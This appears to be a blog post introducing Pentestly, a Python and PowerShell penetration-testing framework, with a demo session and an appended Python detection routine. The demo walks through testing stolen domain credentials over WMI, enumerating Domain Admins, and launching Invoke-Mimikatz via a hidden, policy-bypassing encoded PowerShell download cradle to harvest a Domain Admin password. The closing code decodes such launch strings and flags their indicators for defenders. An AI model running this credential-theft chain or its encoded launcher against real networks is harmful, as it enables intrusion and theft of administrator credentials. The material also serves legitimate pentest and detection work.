Pentestly Framework: When Pentesting Meets Python and Powershell

Python appears to be an ever-growing trend in the security community. Being able to connect Python tools together has proven beneficial for us. Powershell has also seen increasing use due to its wide availability in internal environments. Pentestly utilizes the power of these tools together in a familiar user experience.
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
- Allows us to execute Powershell commands quickly and easily via WMI
- Useful utility for enumerating SMB shares
Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
Below is a proof of concept demonstration of using Pentestly to auto detect Domain Admin from Domain User credentials (from Gladius) using Invoke-Mimikatz.

Demo - one step at a time
Import XML
As with any engagement, XML nmap results from our environment are imported into Pentestly:
[pentestly][demo] > load nmap
[pentestly][demo][nmap_xml] > set FILENAME /home/cduplantis/engagement/port-445.xml
FILENAME => /home/cduplantis/engagement/port-445.xml
[pentestly][demo][nmap_xml] > run
[*] 3 new records added.

[*] 3 total (3 new) ports found.
[pentestly][demo][nmap_xml] > show ports
  | rowid |   ip_address   | host | port | protocol |  module  |
  | 1     |   |      | 445  | tcp      | nmap_xml |
  | 2     | |      | 445  | tcp      | nmap_xml |
  | 3     | |      | 445  | tcp      | nmap_xml |
Credentials, credentials, credentials
We begin by attempting to authenticate with the following credentials received from Gladius:
zojix \ nsportsman : password1!
[pentestly][demo] > load login
[pentestly][demo][login] > set username nsportsman
[pentestly][demo][login] > set password password1!
[pentestly][demo][login] > set domain zojix
[pentestly][demo][login] > run
[*] Success - nsportsman:[email protected]
[*] Fail - nsportsman:[email protected]
[*] Success - nsportsman:[email protected]
[*] Testing execution access of credentials
[*] Execution: zojix\nsportsman:[email protected] - echo
[*] Failed to execute: zojix\nsportsman:[email protected]
[*] Execution: zojix\nsportsman:[email protected] - echo
[*] Successful execution: zojix\nsportsman:[email protected]
w00t! The key takeaway here is the following line:
[*] Successful execution: zojix\nsportsman:[email protected]
This tells us that we do have execution rights on
WhoDunIt? Domain Admins
One useful cross-reference point is to grab the Domain and Enterprise admin list so that if we come across that user’s credentials in the domain, Pentestly will know that we have Domain Admin credentials.
[pentestly][demo] > load get_dom # fuzzy searching for get_domain_admin_names
[pentestly][demo][get_domain_admin_names] > run
[*] Execution: zojix\nsportsman:[email protected] - net groups "Domain Admins" /domain
[*] Found Domain Admin: zojix\Administrator
[*] Found Domain Admin: zojix\TheRealDA
[*] Execution: zojix\nsportsman:[email protected] - net groups "Enterprise Admins" /domain
[*] Found Enterprise Admin: zojix\Administrator
[*] Found Enterprise Admin: zojix\TheRealDA
Mimikatz all the things
For the grand finale, let’s mimikatz the machines on which we have execution access.
[pentestly][demo] > load mimi # Again, fuzzy searching for mimikatz
[pentestly][demo][mimikatz] > run
[*] Execution: zojix\nsportsman:[email protected] - powershell -window hidden -exec bypass -NonInteractive -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE…
...snip long command…
[*] Waiting for Powershell results
- - [04/Feb/2016 07:56:46] "GET /about.html HTTP/1.1" 200 -
- - [04/Feb/2016 07:56:50] "POST / HTTP/1.1" 200 -
Starting web server
After parsing the Mimikatz output, Pentestly attempts to cross reference the user list with the Domain Admin list and immediately recognizes a Domain Admin in the Mimikatz output. Here, Mimikatz recognized a Domain Admin logging into a user workstation machine. Silly, DA.
[*] Success! TheRealDA:<leetpassword>tryGUESSINGthisdrowssaP</leetpassword>  - DOMAIN ADMIN!
You have one DA, do you want to continue to find more? [yN]
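For defenders, the launch string printed in the mimikatz step (hidden window, execution-policy bypass, -Enc blob) is a practical detection point in process-creation logs. The following Python triage routine is an added example, not part of Pentestly or the original post: it decodes the -Enc argument even when the log has truncated it, and flags the traits visible in the demo output. Function names, indicator labels and the sample lines are assumptions constructed for illustration.

```python
import base64
import re

# Flag name plus a base64-looking value; PowerShell accepts any prefix of -EncodedCommand (and -ec).
FLAG_VALUE = re.compile(r"(?:^|\s)[-/](\w+)\s+([A-Za-z0-9+/=]{16,})")
# (label, pattern, where): "cmd" = raw command line, "ps" = decoded script text.
INDICATORS = [
    ("hidden-window", re.compile(r"(?i)\s-w\w*\s+hidden"), "cmd"),
    ("execpolicy-bypass", re.compile(r"(?i)\s-e[xp]\w*\s+bypass"), "cmd"),
    ("invoke-expression", re.compile(r"(?i)\b(iex|invoke-expression)\b"), "ps"),
    ("web-download", re.compile(r"(?i)net\.webclient"), "ps"),
]

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent."""
    for m in FLAG_VALUE.finditer(cmdline):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        b64 = m.group(2).rstrip("=")
        if len(b64) % 4 == 1:  # log truncation can cut in the middle of a base64 quantum
            b64 = b64[:-1]
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        raw = raw[: len(raw) - len(raw) % 2]  # drop a dangling half UTF-16 code unit
        return raw.decode("utf-16-le", errors="replace")
    return None

def triage(cmdline):
    """Return (decoded_script, sorted indicator labels) for one command line."""
    decoded = decode_encoded_command(cmdline)
    text = {"cmd": cmdline, "ps": decoded or ""}
    hits = sorted(label for label, rx, where in INDICATORS if rx.search(text[where]))
    return decoded, hits

# Constructed process-creation command lines. The first reuses the truncated
# launch string printed in the demo output; the second is a benign admin job.
SAMPLES = [
    "powershell -window hidden -exec bypass -NonInteractive -Enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE",
    r"powershell -NoProfile -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        decoded, hits = triage(line)
        print(hits, repr(decoded))
```

Even the truncated blob from the demo decodes far enough to show an IEX download cradle, so alerting does not depend on capturing the full command line.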
  git clone